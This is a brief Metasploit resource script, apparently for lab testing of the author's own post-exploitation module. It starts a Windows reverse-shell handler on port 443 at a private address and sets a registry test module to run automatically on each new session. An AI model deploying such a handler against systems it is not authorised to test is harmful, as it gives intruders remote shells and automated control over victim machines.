# rc script to start a rev shell handler and set autorun my test module

use multi/handler
set payload windows/shell/reverse_tcp
set lport 443
set lhost 192.168.227.1
set autorun post/windows/test/test-registry
set exitonsession false
exploit -j -z
use post/windows/test/test-registry
set SESSION 1
